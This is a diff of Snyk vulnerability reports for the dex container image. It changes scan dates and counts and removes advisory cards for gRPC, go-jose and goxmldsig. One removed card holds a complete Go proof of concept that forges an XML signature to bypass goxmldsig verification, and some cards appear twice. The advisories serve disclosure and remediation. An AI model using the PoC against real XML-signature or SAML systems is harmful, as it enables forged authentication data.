<li class="card__meta__item">
Package Manager: golang
</li>
<li class="card__meta__item">
Vulnerable module:
google.golang.org/grpc
</li>
<li class="card__meta__item">Introduced through:
github.com/hairyhenderson/gomplate/v4@* and google.golang.org/grpc@v1.68.1
</li>
</ul>
<hr/>
<h3 class="card__section__title">Detailed paths</h3>
<ul class="card__meta__paths">
<li>
<span class="list-paths__item__introduced"><em>Introduced through</em>:
github.com/hairyhenderson/gomplate/v4@*
<span class="list-paths__item__arrow"></span>
google.golang.org/grpc@v1.68.1
</span>
</li>
<li>
<span class="list-paths__item__introduced"><em>Introduced through</em>:
github.com/dexidp/dex@*
<span class="list-paths__item__arrow"></span>
google.golang.org/grpc@v1.72.1
</span>
</li>
</ul><!-- .list-paths -->
</div><!-- .card__section -->
<hr/>
<!-- Overview -->
<h2 id="overview">Overview</h2>
<p>Affected versions of this package are vulnerable to Incorrect Authorization in the processing of HTTP/2 <code>:path</code> pseudo-headers in <code>handleStream()</code>. An attacker can gain unauthorized access to restricted resources by sending requests with malformed <code>:path</code> headers that omit the leading slash. This is only exploitable if the server uses path-based authorization interceptors, has deny rules that use canonical paths with leading slashes, and has a fallback allow rule in its policy.</p>
<h2 id="workaround">Workaround</h2>
<p>This vulnerability can be mitigated by adding a validating interceptor that rejects requests with malformed paths, configuring infrastructure (such as reverse proxies) to enforce strict HTTP/2 compliance, or switching to a default-deny authorization policy.</p>
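<p>The interceptor mitigation boils down to a canonical-path check applied before any authorization rule runs; the following is a minimal sketch (the function name and segment policy are assumptions for illustration, not the gRPC API):</p>

```go
package main

import (
	"fmt"
	"strings"
)

// validGRPCPath mirrors the check a validating interceptor would apply to the
// request's method path: canonical gRPC paths look like
// "/package.Service/Method", so anything without a leading slash (or with
// fewer than two slashes) is rejected instead of falling through to an
// allow-by-default policy rule.
func validGRPCPath(path string) bool {
	return strings.HasPrefix(path, "/") && strings.Count(path, "/") >= 2
}

func main() {
	fmt.Println(validGRPCPath("/pkg.Service/Method")) // true
	fmt.Println(validGRPCPath("pkg.Service/Method"))  // false: missing leading slash
}
```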
<h2 id="remediation">Remediation</h2>
<p>Upgrade <code>google.golang.org/grpc</code> to version 1.79.3 or higher.</p>
<h2 id="references">References</h2>
<ul>
<li><a href="https://github.com/grpc/grpc-go/commit/72186f163e75a065c39e6f7df9b6dea07fbdeff5">GitHub Commit</a></li>
</ul>
<hr/>
<div class="cta card__cta">
<p><a href="https://snyk.io/vuln/SNYK-GOLANG-GOOGLEGOLANGORGGRPC-15691172">More about this vulnerability</a></p>
</div>
</div><!-- .card -->
<div class="card card--vuln disclosure--not-new severity--high" data-snyk-test="high">
<h2 class="card__title">CVE-2025-69421</h2>
<div class="card__section">
@@ -1138,193 +1055,6 @@
<p><a href="https://snyk.io/vuln/SNYK-GOLANG-GOOPENTELEMETRYIOOTELSDKRESOURCE-15182758">More about this vulnerability</a></p>
</div>
</div><!-- .card -->
<div class="card card--vuln disclosure--not-new severity--high" data-snyk-test="high">
<h2 class="card__title">Improper Verification of Cryptographic Signature</h2>
<div class="card__section">
<div class="card__labels">
<div class="label label--high">
<span class="label__text">high severity</span>
</div>
<div class="label label--exploit">
<span class="label__text">Exploit: Proof of Concept</span>
</div>
</div>
<hr/>
<ul class="card__meta">
<li class="card__meta__item">
Manifest file: ghcr.io/dexidp/dex:v2.43.0/dexidp/dex <span class="list-paths__item__arrow"></span> /usr/local/bin/dex
</li>
<li class="card__meta__item">
Package Manager: golang
</li>
<li class="card__meta__item">
Vulnerable module:
github.com/russellhaering/goxmldsig
</li>
<li class="card__meta__item">Introduced through:
github.com/dexidp/dex@* and github.com/russellhaering/goxmldsig@v1.5.0
</li>
</ul>
<hr/>
<h3 class="card__section__title">Detailed paths</h3>
<ul class="card__meta__paths">
<li>
<span class="list-paths__item__introduced"><em>Introduced through</em>:
github.com/dexidp/dex@*
<span class="list-paths__item__arrow"></span>
github.com/russellhaering/goxmldsig@v1.5.0
</span>
</li>
</ul><!-- .list-paths -->
</div><!-- .card__section -->
<hr/>
<!-- Overview -->
<h2 id="overview">Overview</h2>
<p><a href="https://github.com/russellhaering/goxmldsig">github.com/russellhaering/goxmldsig</a> is an XML Digital Signatures library implemented in pure Go.</p>
<p>Affected versions of this package are vulnerable to Improper Verification of Cryptographic Signature through the <code>validateSignature</code> function in the <code>validate.go</code> file. An attacker can bypass integrity checks and alter the contents of signed elements by exploiting pointer aliasing on a loop variable, allowing them to replace one element&#39;s contents with another referenced element&#39;s.</p>
<h2 id="poc">PoC</h2>
<pre><code>package main

import (
    &quot;crypto/rand&quot;
    &quot;crypto/rsa&quot;
    &quot;crypto/tls&quot;
    &quot;crypto/x509&quot;
    &quot;encoding/base64&quot;
    &quot;fmt&quot;
    &quot;math/big&quot;
    &quot;time&quot;

    &quot;github.com/beevik/etree&quot;
    dsig &quot;github.com/russellhaering/goxmldsig&quot;
)

func main() {
    key, err := rsa.GenerateKey(rand.Reader, 2048)
    if err != nil {
        panic(err)
    }
    template := &amp;x509.Certificate{
        SerialNumber: big.NewInt(1),
        NotBefore:    time.Now().Add(-1 * time.Hour),
        NotAfter:     time.Now().Add(1 * time.Hour),
    }
    certDER, err := x509.CreateCertificate(rand.Reader, template, template, &amp;key.PublicKey, key)
    if err != nil {
        panic(err)
    }
    cert, _ := x509.ParseCertificate(certDER)
    doc := etree.NewDocument()
    root := doc.CreateElement(&quot;Root&quot;)
    root.CreateAttr(&quot;ID&quot;, &quot;target&quot;)
    root.SetText(&quot;Malicious Content&quot;)
    tlsCert := tls.Certificate{
        Certificate: [][]byte{cert.Raw},
        PrivateKey:  key,
    }
    ks := dsig.TLSCertKeyStore(tlsCert)
    signingCtx := dsig.NewDefaultSigningContext(ks)
    sig, err := signingCtx.ConstructSignature(root, true)
    if err != nil {
        panic(err)
    }
    signedInfo := sig.FindElement(&quot;./SignedInfo&quot;)
    existingRef := signedInfo.FindElement(&quot;./Reference&quot;)
    existingRef.CreateAttr(&quot;URI&quot;, &quot;#dummy&quot;)
    originalEl := etree.NewElement(&quot;Root&quot;)
    originalEl.CreateAttr(&quot;ID&quot;, &quot;target&quot;)
    originalEl.SetText(&quot;Original Content&quot;)
    sig1, _ := signingCtx.ConstructSignature(originalEl, true)
    ref1 := sig1.FindElement(&quot;./SignedInfo/Reference&quot;).Copy()
    signedInfo.InsertChildAt(existingRef.Index(), ref1)
    c14n := signingCtx.Canonicalizer
    detachedSI := signedInfo.Copy()
    if detachedSI.SelectAttr(&quot;xmlns:&quot;+dsig.DefaultPrefix) == nil {
        detachedSI.CreateAttr(&quot;xmlns:&quot;+dsig.DefaultPrefix, dsig.Namespace)
    }
    canonicalBytes, err := c14n.Canonicalize(detachedSI)
    if err != nil {
        fmt.Println(&quot;c14n error:&quot;, err)
        return
    }
    hash := signingCtx.Hash.New()
    hash.Write(canonicalBytes)
    digest := hash.Sum(nil)
    rawSig, err := rsa.SignPKCS1v15(rand.Reader, key, signingCtx.Hash, digest)
    if err != nil {
        panic(err)
    }
    sigVal := sig.FindElement(&quot;./SignatureValue&quot;)
    sigVal.SetText(base64.StdEncoding.EncodeToString(rawSig))
    certStore := &amp;dsig.MemoryX509CertificateStore{
        Roots: []*x509.Certificate{cert},
    }
    valCtx := dsig.NewDefaultValidationContext(certStore)
    root.AddChild(sig)
    doc.SetRoot(root)
    str, _ := doc.WriteToString()
    fmt.Println(&quot;XML:&quot;)
    fmt.Println(str)
    validated, err := valCtx.Validate(root)
    if err != nil {
        fmt.Println(&quot;validation failed:&quot;, err)
    } else {
        fmt.Println(&quot;validation ok&quot;)
        fmt.Println(&quot;validated text:&quot;, validated.Text())
    }
}
</code></pre>
<h2 id="remediation">Remediation</h2>
<p>Upgrade <code>github.com/russellhaering/goxmldsig</code> to version 1.6.0 or higher.</p>
<h2 id="references">References</h2>
<ul>
<li><a href="https://github.com/russellhaering/goxmldsig/commit/db3d1e31f7535d7f5debb49851b9e9a2ff08b936">GitHub Commit</a></li>
</ul>
<hr/>
<div class="cta card__cta">
<p><a href="https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMRUSSELLHAERINGGOXMLDSIG-15692488">More about this vulnerability</a></p>
</div>
</div><!-- .card -->
<div class="card card--vuln disclosure--not-new severity--high" data-snyk-test="high">
<h2 class="card__title">Asymmetric Resource Consumption (Amplification)</h2>
@@ -1399,92 +1129,6 @@
<p><a href="https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGOLANGJWTJWTV5-9510922">More about this vulnerability</a></p>
</div>
</div><!-- .card -->
<div class="card card--vuln disclosure--not-new severity--high" data-snyk-test="high">
<h2 class="card__title">Uncaught Exception</h2>
<div class="card__section">
<div class="card__labels">
<div class="label label--high">
<span class="label__text">high severity</span>
</div>
<div class="label label--exploit">
<span class="label__text">Exploit: Not Defined</span>
</div>
</div>
<hr/>
<ul class="card__meta">
<li class="card__meta__item">
Manifest file: ghcr.io/dexidp/dex:v2.43.0/hairyhenderson/gomplate/v4 <span class="list-paths__item__arrow"></span> /usr/local/bin/gomplate
</li>
<li class="card__meta__item">
Package Manager: golang
</li>
<li class="card__meta__item">
Vulnerable module:
github.com/go-jose/go-jose/v4
</li>
<li class="card__meta__item">Introduced through:
github.com/hairyhenderson/gomplate/v4@* and github.com/go-jose/go-jose/v4@v4.0.2
</li>
</ul>
<hr/>
<h3 class="card__section__title">Detailed paths</h3>
<ul class="card__meta__paths">
<li>
<span class="list-paths__item__introduced"><em>Introduced through</em>:
github.com/hairyhenderson/gomplate/v4@*
<span class="list-paths__item__arrow"></span>
github.com/go-jose/go-jose/v4@v4.0.2
</span>
</li>
<li>
<span class="list-paths__item__introduced"><em>Introduced through</em>:
github.com/dexidp/dex@*
<span class="list-paths__item__arrow"></span>
github.com/go-jose/go-jose/v4@v4.1.0
</span>
</li>
</ul><!-- .list-paths -->
</div><!-- .card__section -->
<hr/>
<!-- Overview -->
<h2 id="overview">Overview</h2>
<p>Affected versions of this package are vulnerable to Uncaught Exception in the <code>cipher.KeyUnwrap</code> function when decrypting a JSON Web Encryption (JWE) object with a key wrapping algorithm (ending in &#39;KW&#39;, except for &#39;A128GCMKW&#39;, &#39;A192GCMKW&#39;, and &#39;A256GCMKW&#39;) and the <code>encrypted_key</code> field is empty. An attacker can cause a panic and disrupt service by submitting a crafted JWE object with an empty <code>encrypted_key</code> field or by directly invoking <code>cipher.KeyUnwrap</code> with a ciphertext parameter less than 16 bytes long.</p>
<p><strong>Note:</strong></p>
<p>This is only exploitable if the list of accepted key algorithms includes key wrapping algorithms.</p>
<h2 id="workaround">Workaround</h2>
<p>This vulnerability can be mitigated by prevalidating JWE objects to ensure the <code>encrypted_key</code> field is nonempty, or by excluding key wrapping algorithms from the list of accepted key algorithms.</p>
<h2 id="remediation">Remediation</h2>
<p>Upgrade <code>github.com/go-jose/go-jose/v4</code> to version 4.1.4 or higher.</p>
<h2 id="references">References</h2>
<ul>
<li><a href="https://github.com/go-jose/go-jose/security/advisories/GHSA-78h2-9frx-2jm8">GitHub Advisory</a></li>
<li><a href="https://github.com/go-jose/go-jose/commit/0e59876635f3dbf46d7b5e97b52bb75a3f96e7d9">GitHub Commit</a></li>
</ul>
<hr/>
<div class="cta card__cta">
<p><a href="https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGOJOSEGOJOSEV4-15875221">More about this vulnerability</a></p>
</div>
</div><!-- .card -->
<div class="card card--vuln disclosure--not-new severity--medium" data-snyk-test="medium">
<h2 class="card__title">Inefficient Algorithmic Complexity</h2>


@@ -492,7 +492,7 @@
<div class="header-wrap">
<h1 class="project__header__title">Snyk test report</h1>
<p class="timestamp">April 5th 2026, 12:40:22 am (UTC+00:00)</p>
<p class="timestamp">March 8th 2026, 12:36:33 am (UTC+00:00)</p>
</div>
<div class="source-panel">
<span>Scanned the following path:</span>


@@ -492,7 +492,7 @@
<div class="header-wrap">
<h1 class="project__header__title">Snyk test report</h1>
<p class="timestamp">April 5th 2026, 12:46:10 am (UTC+00:00)</p>
<p class="timestamp">March 8th 2026, 12:36:40 am (UTC+00:00)</p>
</div>
<div class="source-panel">
<span>Scanned the following paths:</span>
@@ -505,7 +505,7 @@
<div class="meta-counts">
<div class="meta-count"><span>12</span> <span>known vulnerabilities</span></div>
<div class="meta-count"><span>100 vulnerable dependency paths</span></div>
<div class="meta-count"><span>20</span> <span>dependencies</span></div>
<div class="meta-count"><span>19</span> <span>dependencies</span></div>
</div><!-- .meta-counts -->
</div><!-- .layout-container--short -->
</header><!-- .project__header -->

File diff suppressed because it is too large

File diff suppressed because it is too large

File diff suppressed because it is too large


@@ -456,7 +456,7 @@
<div class="header-wrap">
<h1 class="project__header__title">Snyk test report</h1>
<p class="timestamp">April 5th 2026, 12:45:13 am (UTC+00:00)</p>
<p class="timestamp">March 8th 2026, 12:35:48 am (UTC+00:00)</p>
</div>
<div class="source-panel">
<span>Scanned the following path:</span>


@@ -456,7 +456,7 @@
<div class="header-wrap">
<h1 class="project__header__title">Snyk test report</h1>
<p class="timestamp">April 5th 2026, 12:45:22 am (UTC+00:00)</p>
<p class="timestamp">March 8th 2026, 12:35:58 am (UTC+00:00)</p>
</div>
<div class="source-panel">
<span>Scanned the following path:</span>

File diff suppressed because it is too large


@@ -7,7 +7,7 @@
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>Snyk test report</title>
<meta name="description" content="49 known vulnerabilities found in 146 vulnerable dependency paths.">
<meta name="description" content="46 known vulnerabilities found in 141 vulnerable dependency paths.">
<base target="_blank">
<link rel="icon" type="image/png" href="https://res.cloudinary.com/snyk/image/upload/v1468845142/favicon/favicon.png"
sizes="194x194">
@@ -492,7 +492,7 @@
<div class="header-wrap">
<h1 class="project__header__title">Snyk test report</h1>
<p class="timestamp">April 5th 2026, 12:40:17 am (UTC+00:00)</p>
<p class="timestamp">March 8th 2026, 12:33:53 am (UTC+00:00)</p>
</div>
<div class="source-panel">
<span>Scanned the following paths:</span>
@@ -505,9 +505,9 @@
</div>
<div class="meta-counts">
<div class="meta-count"><span>49</span> <span>known vulnerabilities</span></div>
<div class="meta-count"><span>146 vulnerable dependency paths</span></div>
<div class="meta-count"><span>1134</span> <span>dependencies</span></div>
<div class="meta-count"><span>46</span> <span>known vulnerabilities</span></div>
<div class="meta-count"><span>141 vulnerable dependency paths</span></div>
<div class="meta-count"><span>1131</span> <span>dependencies</span></div>
</div><!-- .meta-counts -->
</div><!-- .layout-container--short -->
</header><!-- .project__header -->
@@ -515,89 +515,6 @@
<div class="layout-container" style="padding-top: 35px;">
<div class="cards--vuln filter--patch filter--ignore">
<div class="card card--vuln disclosure--not-new severity--critical" data-snyk-test="critical">
<h2 class="card__title">Incorrect Authorization</h2>
<div class="card__section">
<div class="card__labels">
<div class="label label--critical">
<span class="label__text">critical severity</span>
</div>
<div class="label label--exploit">
<span class="label__text">Exploit: Not Defined</span>
</div>
</div>
<hr/>
<ul class="card__meta">
<li class="card__meta__item">
Manifest file: ghcr.io/dexidp/dex:v2.43.0/hairyhenderson/gomplate/v4 <span class="list-paths__item__arrow"></span> /usr/local/bin/gomplate
</li>
<li class="card__meta__item">
Package Manager: golang
</li>
<li class="card__meta__item">
Vulnerable module:
google.golang.org/grpc
</li>
<li class="card__meta__item">Introduced through:
github.com/hairyhenderson/gomplate/v4@* and google.golang.org/grpc@v1.68.1
</li>
</ul>
<hr/>
<h3 class="card__section__title">Detailed paths</h3>
<ul class="card__meta__paths">
<li>
<span class="list-paths__item__introduced"><em>Introduced through</em>:
github.com/hairyhenderson/gomplate/v4@*
<span class="list-paths__item__arrow"></span>
google.golang.org/grpc@v1.68.1
</span>
</li>
<li>
<span class="list-paths__item__introduced"><em>Introduced through</em>:
github.com/dexidp/dex@*
<span class="list-paths__item__arrow"></span>
google.golang.org/grpc@v1.72.1
</span>
</li>
</ul><!-- .list-paths -->
</div><!-- .card__section -->
<hr/>
<!-- Overview -->
<h2 id="overview">Overview</h2>
<p>Affected versions of this package are vulnerable to Incorrect Authorization in the processing of HTTP/2 <code>:path</code> pseudo-headers in <code>handleStream()</code>. An attacker can gain unauthorized access to restricted resources by sending requests with malformed <code>:path</code> headers that omit the leading slash. This is only exploitable if the server uses path-based authorization interceptors, has deny rules that use canonical paths with leading slashes, and has a fallback allow rule in its policy.</p>
<h2 id="workaround">Workaround</h2>
<p>This vulnerability can be mitigated by adding a validating interceptor that rejects requests with malformed paths, configuring infrastructure (such as reverse proxies) to enforce strict HTTP/2 compliance, or switching to a default-deny authorization policy.</p>
<h2 id="remediation">Remediation</h2>
<p>Upgrade <code>google.golang.org/grpc</code> to version 1.79.3 or higher.</p>
<h2 id="references">References</h2>
<ul>
<li><a href="https://github.com/grpc/grpc-go/commit/72186f163e75a065c39e6f7df9b6dea07fbdeff5">GitHub Commit</a></li>
</ul>
<hr/>
<div class="cta card__cta">
<p><a href="https://snyk.io/vuln/SNYK-GOLANG-GOOGLEGOLANGORGGRPC-15691172">More about this vulnerability</a></p>
</div>
</div><!-- .card -->
<div class="card card--vuln disclosure--not-new severity--high" data-snyk-test="high">
<h2 class="card__title">CVE-2025-69421</h2>
<div class="card__section">
@@ -1138,193 +1055,6 @@
<p><a href="https://snyk.io/vuln/SNYK-GOLANG-GOOPENTELEMETRYIOOTELSDKRESOURCE-15182758">More about this vulnerability</a></p>
</div>
</div><!-- .card -->
<div class="card card--vuln disclosure--not-new severity--high" data-snyk-test="high">
<h2 class="card__title">Improper Verification of Cryptographic Signature</h2>
<div class="card__section">
<div class="card__labels">
<div class="label label--high">
<span class="label__text">high severity</span>
</div>
<div class="label label--exploit">
<span class="label__text">Exploit: Proof of Concept</span>
</div>
</div>
<hr/>
<ul class="card__meta">
<li class="card__meta__item">
Manifest file: ghcr.io/dexidp/dex:v2.43.0/dexidp/dex <span class="list-paths__item__arrow"></span> /usr/local/bin/dex
</li>
<li class="card__meta__item">
Package Manager: golang
</li>
<li class="card__meta__item">
Vulnerable module:
github.com/russellhaering/goxmldsig
</li>
<li class="card__meta__item">Introduced through:
github.com/dexidp/dex@* and github.com/russellhaering/goxmldsig@v1.5.0
</li>
</ul>
<hr/>
<h3 class="card__section__title">Detailed paths</h3>
<ul class="card__meta__paths">
<li>
<span class="list-paths__item__introduced"><em>Introduced through</em>:
github.com/dexidp/dex@*
<span class="list-paths__item__arrow"></span>
github.com/russellhaering/goxmldsig@v1.5.0
</span>
</li>
</ul><!-- .list-paths -->
</div><!-- .card__section -->
<hr/>
<!-- Overview -->
<h2 id="overview">Overview</h2>
<p><a href="https://github.com/russellhaering/goxmldsig">github.com/russellhaering/goxmldsig</a> is an XML Digital Signatures library implemented in pure Go.</p>
<p>Affected versions of this package are vulnerable to Improper Verification of Cryptographic Signature through the <code>validateSignature</code> function in the <code>validate.go</code> file. An attacker can bypass integrity checks and alter the contents of signed elements by exploiting pointer aliasing on a loop variable, allowing them to replace one element&#39;s contents with another referenced element&#39;s.</p>
<h2 id="poc">PoC</h2>
<pre><code>package main

import (
    &quot;crypto/rand&quot;
    &quot;crypto/rsa&quot;
    &quot;crypto/tls&quot;
    &quot;crypto/x509&quot;
    &quot;encoding/base64&quot;
    &quot;fmt&quot;
    &quot;math/big&quot;
    &quot;time&quot;

    &quot;github.com/beevik/etree&quot;
    dsig &quot;github.com/russellhaering/goxmldsig&quot;
)

func main() {
    key, err := rsa.GenerateKey(rand.Reader, 2048)
    if err != nil {
        panic(err)
    }
    template := &amp;x509.Certificate{
        SerialNumber: big.NewInt(1),
        NotBefore:    time.Now().Add(-1 * time.Hour),
        NotAfter:     time.Now().Add(1 * time.Hour),
    }
    certDER, err := x509.CreateCertificate(rand.Reader, template, template, &amp;key.PublicKey, key)
    if err != nil {
        panic(err)
    }
    cert, _ := x509.ParseCertificate(certDER)
    doc := etree.NewDocument()
    root := doc.CreateElement(&quot;Root&quot;)
    root.CreateAttr(&quot;ID&quot;, &quot;target&quot;)
    root.SetText(&quot;Malicious Content&quot;)
    tlsCert := tls.Certificate{
        Certificate: [][]byte{cert.Raw},
        PrivateKey:  key,
    }
    ks := dsig.TLSCertKeyStore(tlsCert)
    signingCtx := dsig.NewDefaultSigningContext(ks)
    sig, err := signingCtx.ConstructSignature(root, true)
    if err != nil {
        panic(err)
    }
    signedInfo := sig.FindElement(&quot;./SignedInfo&quot;)
    existingRef := signedInfo.FindElement(&quot;./Reference&quot;)
    existingRef.CreateAttr(&quot;URI&quot;, &quot;#dummy&quot;)
    originalEl := etree.NewElement(&quot;Root&quot;)
    originalEl.CreateAttr(&quot;ID&quot;, &quot;target&quot;)
    originalEl.SetText(&quot;Original Content&quot;)
    sig1, _ := signingCtx.ConstructSignature(originalEl, true)
    ref1 := sig1.FindElement(&quot;./SignedInfo/Reference&quot;).Copy()
    signedInfo.InsertChildAt(existingRef.Index(), ref1)
    c14n := signingCtx.Canonicalizer
    detachedSI := signedInfo.Copy()
    if detachedSI.SelectAttr(&quot;xmlns:&quot;+dsig.DefaultPrefix) == nil {
        detachedSI.CreateAttr(&quot;xmlns:&quot;+dsig.DefaultPrefix, dsig.Namespace)
    }
    canonicalBytes, err := c14n.Canonicalize(detachedSI)
    if err != nil {
        fmt.Println(&quot;c14n error:&quot;, err)
        return
    }
    hash := signingCtx.Hash.New()
    hash.Write(canonicalBytes)
    digest := hash.Sum(nil)
    rawSig, err := rsa.SignPKCS1v15(rand.Reader, key, signingCtx.Hash, digest)
    if err != nil {
        panic(err)
    }
    sigVal := sig.FindElement(&quot;./SignatureValue&quot;)
    sigVal.SetText(base64.StdEncoding.EncodeToString(rawSig))
    certStore := &amp;dsig.MemoryX509CertificateStore{
        Roots: []*x509.Certificate{cert},
    }
    valCtx := dsig.NewDefaultValidationContext(certStore)
    root.AddChild(sig)
    doc.SetRoot(root)
    str, _ := doc.WriteToString()
    fmt.Println(&quot;XML:&quot;)
    fmt.Println(str)
    validated, err := valCtx.Validate(root)
    if err != nil {
        fmt.Println(&quot;validation failed:&quot;, err)
    } else {
        fmt.Println(&quot;validation ok&quot;)
        fmt.Println(&quot;validated text:&quot;, validated.Text())
    }
}
</code></pre>
<h2 id="remediation">Remediation</h2>
<p>Upgrade <code>github.com/russellhaering/goxmldsig</code> to version 1.6.0 or higher.</p>
<h2 id="references">References</h2>
<ul>
<li><a href="https://github.com/russellhaering/goxmldsig/commit/db3d1e31f7535d7f5debb49851b9e9a2ff08b936">GitHub Commit</a></li>
</ul>
<hr/>
<div class="cta card__cta">
<p><a href="https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMRUSSELLHAERINGGOXMLDSIG-15692488">More about this vulnerability</a></p>
</div>
</div><!-- .card -->
<div class="card card--vuln disclosure--not-new severity--high" data-snyk-test="high">
<h2 class="card__title">Asymmetric Resource Consumption (Amplification)</h2>
@@ -1399,92 +1129,6 @@
<p><a href="https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGOLANGJWTJWTV5-9510922">More about this vulnerability</a></p>
</div>
</div><!-- .card -->
<div class="card card--vuln disclosure--not-new severity--high" data-snyk-test="high">
<h2 class="card__title">Uncaught Exception</h2>
<div class="card__section">
<div class="card__labels">
<div class="label label--high">
<span class="label__text">high severity</span>
</div>
<div class="label label--exploit">
<span class="label__text">Exploit: Not Defined</span>
</div>
</div>
<hr/>
<ul class="card__meta">
<li class="card__meta__item">
Manifest file: ghcr.io/dexidp/dex:v2.43.0/hairyhenderson/gomplate/v4 <span class="list-paths__item__arrow"></span> /usr/local/bin/gomplate
</li>
<li class="card__meta__item">
Package Manager: golang
</li>
<li class="card__meta__item">
Vulnerable module:
github.com/go-jose/go-jose/v4
</li>
<li class="card__meta__item">Introduced through:
github.com/hairyhenderson/gomplate/v4@* and github.com/go-jose/go-jose/v4@v4.0.2
</li>
</ul>
<hr/>
<h3 class="card__section__title">Detailed paths</h3>
<ul class="card__meta__paths">
<li>
<span class="list-paths__item__introduced"><em>Introduced through</em>:
github.com/hairyhenderson/gomplate/v4@*
<span class="list-paths__item__arrow"></span>
github.com/go-jose/go-jose/v4@v4.0.2
</span>
</li>
<li>
<span class="list-paths__item__introduced"><em>Introduced through</em>:
github.com/dexidp/dex@*
<span class="list-paths__item__arrow"></span>
github.com/go-jose/go-jose/v4@v4.1.0
</span>
</li>
</ul><!-- .list-paths -->
</div><!-- .card__section -->
<hr/>
<!-- Overview -->
<h2 id="overview">Overview</h2>
<p>Affected versions of this package are vulnerable to Uncaught Exception in the <code>cipher.KeyUnwrap</code> function when decrypting a JSON Web Encryption (JWE) object with a key wrapping algorithm (ending in &#39;KW&#39;, except for &#39;A128GCMKW&#39;, &#39;A192GCMKW&#39;, and &#39;A256GCMKW&#39;) and the <code>encrypted_key</code> field is empty. An attacker can cause a panic and disrupt service by submitting a crafted JWE object with an empty <code>encrypted_key</code> field or by directly invoking <code>cipher.KeyUnwrap</code> with a ciphertext parameter less than 16 bytes long.</p>
<p><strong>Note:</strong></p>
<p>This is only exploitable if the list of accepted key algorithms includes key wrapping algorithms.</p>
<h2 id="workaround">Workaround</h2>
<p>This vulnerability can be mitigated by prevalidating JWE objects to ensure the <code>encrypted_key</code> field is nonempty, or by excluding key wrapping algorithms from the list of accepted key algorithms.</p>
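<p>As a sketch of the prevalidation approach: a compact JWE serialization has five dot-separated parts, and the <code>encrypted_key</code> is the second part. The helper below is hypothetical (not part of <code>go-jose</code>) and rejects tokens whose <code>encrypted_key</code> segment is empty before they reach <code>cipher.KeyUnwrap</code>. Note that direct-encryption (<code>dir</code>) tokens legitimately carry an empty segment, so this check only applies when key wrapping algorithms are in the accepted list.</p>

```go
package main

import (
	"errors"
	"fmt"
	"strings"
)

// prevalidateJWE rejects compact JWE tokens whose encrypted_key segment
// (the second of five dot-separated parts) is empty. Hypothetical helper
// illustrating the workaround above; apply it only when key wrapping
// ("...KW") algorithms are accepted, since "dir" tokens legitimately
// have an empty encrypted_key.
func prevalidateJWE(token string) error {
	parts := strings.Split(token, ".")
	if len(parts) != 5 {
		return errors.New("not a compact JWE: expected 5 parts")
	}
	if parts[1] == "" {
		return errors.New("empty encrypted_key: rejecting token")
	}
	return nil
}

func main() {
	// A crafted token with an empty encrypted_key segment (header..iv.ct.tag).
	crafted := "eyJhbGciOiJBMTI4S1cifQ..aXY.Y3Q.dGFn"
	fmt.Println(prevalidateJWE(crafted))
}
```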
<h2 id="remediation">Remediation</h2>
<p>Upgrade <code>github.com/go-jose/go-jose/v4</code> to version 4.1.4 or higher.</p>
<h2 id="references">References</h2>
<ul>
<li><a href="https://github.com/go-jose/go-jose/security/advisories/GHSA-78h2-9frx-2jm8">GitHub Advisory</a></li>
<li><a href="https://github.com/go-jose/go-jose/commit/0e59876635f3dbf46d7b5e97b52bb75a3f96e7d9">GitHub Commit</a></li>
</ul>
<hr/>
<div class="cta card__cta">
<p><a href="https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGOJOSEGOJOSEV4-15875221">More about this vulnerability</a></p>
</div>
</div><!-- .card -->
<div class="card card--vuln disclosure--not-new severity--medium" data-snyk-test="medium">
<h2 class="card__title">Inefficient Algorithmic Complexity</h2>


@@ -492,7 +492,7 @@
<div class="header-wrap">
<h1 class="project__header__title">Snyk test report</h1>
<p class="timestamp">April 5th 2026, 12:46:02 am (UTC+00:00)</p>
<p class="timestamp">March 8th 2026, 12:33:58 am (UTC+00:00)</p>
</div>
<div class="source-panel">
<span>Scanned the following path:</span>

Some files were not shown because too many files have changed in this diff.